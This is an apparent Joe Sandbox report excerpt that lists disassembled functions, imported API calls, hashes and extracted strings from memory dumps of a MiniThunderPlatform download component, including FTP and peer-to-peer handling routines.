                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?8D@1@@std@@D@2@@0@V?$basic_string@$H_prologmalloc
                                                                                                                                              • String ID: backend_agent.dll$down_dispatcher.dll$fs.dll$p2p.dll$p2p_local_res.dll$p2p_upload.dll$p2sp.dll$ptl.dll$xl_stat.dll
                                                                                                                                              • API String ID: 3073839786-2814801369
                                                                                                                                              • Opcode ID: e1921ed07532963dfecc0c45ce3ae901ed119d14690066b7e5b5ef3a5db6f875
                                                                                                                                              • Instruction ID: 74bf01a8f58d52b2d575e4c3b943c05d4dd8501586d7cf1f3c8d9308e69f7d3b
                                                                                                                                              • Opcode Fuzzy Hash: e1921ed07532963dfecc0c45ce3ae901ed119d14690066b7e5b5ef3a5db6f875
                                                                                                                                              • Instruction Fuzzy Hash: C241D235A06316AADF48DBB46D42B9E27D8DF907A1F20842BB405FB1C1DF74D7815714
                                                                                                                                              Function 100BC150 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 212COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(00000038), ref: 100BC1CA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100BC1F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource), ref: 100BC20D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC271
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC280
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(server_is_valid), ref: 100BC28F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource), ref: 100BC2A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC307
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC316
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_p2s), ref: 100BC325
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100BC339
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC399
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC3A8
                                                                                                                                                • Part of subcall function 100BBDC0: RtlEnterCriticalSection.NTDLL(00000030), ref: 100BBDFC
                                                                                                                                                • Part of subcall function 100BBDC0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 100BBE40
                                                                                                                                                • Part of subcall function 100BBDC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100BBE8D
                                                                                                                                                • Part of subcall function 100BBDC0: RtlLeaveCriticalSection.NTDLL(?), ref: 100BBE98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$CriticalSection$??$?D@1@@std@@D@2@@0@0@EnterInitializeLeaveV?$basic_string@
                                                                                                                                              • String ID: enable_p2s$origin_is_valid$p2sp_task$resource$server_is_valid
                                                                                                                                              • API String ID: 2770638384-3993266642
                                                                                                                                              • Opcode ID: 5e91811906a0b5f364922efc9151a861048a4b0efd464c3dd44f1ad724318765
                                                                                                                                              • Instruction ID: db9c2fb473373ded5edf343f27464bff0627bb8ea1e581697a6ccc9d3ca3fb38
                                                                                                                                              • Opcode Fuzzy Hash: 5e91811906a0b5f364922efc9151a861048a4b0efd464c3dd44f1ad724318765
                                                                                                                                              • Instruction Fuzzy Hash: E09132751087819FD314CF68C988A5AFBE8FF98B00F508A4DF59A87261D770E948CF62
                                                                                                                                              Function 1009D690 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 163COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D73F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D751
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009D78E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D79F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER), ref: 1009D7AE
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009D7DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D7F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D764
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D898
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8BD
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009D8E7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8F8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER), ref: 1009D907
                                                                                                                                                • Part of subcall function 1009C690: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009C6A6
                                                                                                                                                • Part of subcall function 1009C690: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009C6BA
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?append@?$basic_string@V12@V12@@$D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?9H_prolog$??$?8_ultoa
                                                                                                                                              • String ID: USER$does not surpport this type of ftp proxy
                                                                                                                                              • API String ID: 4024142931-1749272867
                                                                                                                                              • Opcode ID: 085e6be74986b64f9ebece1658b85adc203d39fee804c1db71bfbb87166ee60d
                                                                                                                                              • Instruction ID: 2ac1d7485d66b6b993a45f71ba57bc011deb28e65f6a45df6d6d007a3af8f168
                                                                                                                                              • Opcode Fuzzy Hash: 085e6be74986b64f9ebece1658b85adc203d39fee804c1db71bfbb87166ee60d
                                                                                                                                              • Instruction Fuzzy Hash: A2611A750083C19FD335DB64C998BDFBBE8ABA9304F008A4EF59E92251DB746148CB63
                                                                                                                                              Function 1007C230 Relevance: 31.7, APIs: 21, Instructions: 157COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 1007C288
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C29B
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 1007C2B4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C2C8
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C2F3
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,102483D4,000000FF), ref: 1007C326
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1007C34B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C358
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C399
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3BB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3CC
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C3DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C402
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C424
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C435
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C446
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 1007C48D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C49A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C4BA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@$CriticalDeleteSection$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2167666714-0
                                                                                                                                              • Opcode ID: 1eee1c417e86c84eefdbe37e0b62588d5d421bb8513048d4caa3a7ba97d81584
                                                                                                                                              • Instruction ID: 352e90b3f0570da13830e0fc2fe6f382fd23b8b7ee1539e3933d726f2bb34069
                                                                                                                                              • Opcode Fuzzy Hash: 1eee1c417e86c84eefdbe37e0b62588d5d421bb8513048d4caa3a7ba97d81584
                                                                                                                                              • Instruction Fuzzy Hash: 34711D74104B828FD715CF65C88879BBBE4AF59305F44895DE4AB83282DB74B249CF62
                                                                                                                                              Function 1009D410 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 151COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,PASS), ref: 1009D504
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(PASS ******), ref: 1009D516
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D5EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@D@1@@std@@D@2@@0@V?$basic_string@$??$?8??1?$basic_string@V01@Y?$basic_string@$??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$PASS$PASS ******$USER$USER ******$data_len <= FTP_BUFFER_SIZE$thunder_assert
                                                                                                                                              • API String ID: 850880153-2042875501
                                                                                                                                              • Opcode ID: 5e6f9c6f7bbca2e404babc3f0369f681cf5d9d30cb82b3d4365ee0d572da9b6f
                                                                                                                                              • Instruction ID: b90549aa4c67b847b18031d0dbabcd7fc197c574bd8e518d2381d4d1bd1eafc3
                                                                                                                                              • Opcode Fuzzy Hash: 5e6f9c6f7bbca2e404babc3f0369f681cf5d9d30cb82b3d4365ee0d572da9b6f
                                                                                                                                              • Instruction Fuzzy Hash: F4517935104340AFCB24DF54CC88B9ABBA8FFAA715F40455DF84A9B291C770A948CFA2
                                                                                                                                              Function 10078120 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 194COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10078178
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 10027330: FindFirstFileA.KERNEL32(?), ref: 1002735E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007829A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100782BB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100782DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078300
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078324
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007833E
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,00000001), ref: 1007835F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(1027E260), ref: 10078384
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100783B0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100783C2
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E25C), ref: 100783D4
                                                                                                                                              • ?insert@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IABV12@@Z.MSVCP71(00000000,?), ref: 100783EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078400
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EC5B
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EC75
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EC8C
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECC5
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECD7
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECE9
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ED12
                                                                                                                                                • Part of subcall function 10027330: FindClose.KERNEL32(00000000), ref: 10027381
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1007841D
